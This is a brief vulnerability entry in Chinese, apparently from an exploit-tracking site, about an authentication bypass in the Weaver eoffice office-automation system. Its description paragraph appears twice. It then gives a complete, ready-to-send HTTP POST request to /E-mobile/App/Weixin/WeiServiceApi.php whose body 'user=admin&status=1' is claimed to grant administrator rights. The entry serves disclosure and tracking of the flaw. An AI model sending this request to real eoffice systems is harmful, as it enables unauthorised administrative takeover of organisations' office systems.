Description
泛微 eoffice 是一款广泛应用于企业的办公自动化系统。该漏洞存在于 /E-mobile/App/Weixin/WeiServiceApi.php 接口中,攻击者可以通过发送特制的请求绕过权限验证,进而获取到管理员的权限。
泛微 eoffice 是一款广泛应用于企业的办公自动化系统。该漏洞存在于 /E-mobile/App/Weixin/WeiServiceApi.php 接口中,攻击者可以通过发送特制的请求绕过权限验证,进而获取到管理员的权限。
POST /E-mobile/App/Weixin/WeiServiceApi.php?a=other HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
Content-Length: 19
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv 11.0) like Gecko
Accept-Encoding: gzip
user=admin&status=1
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.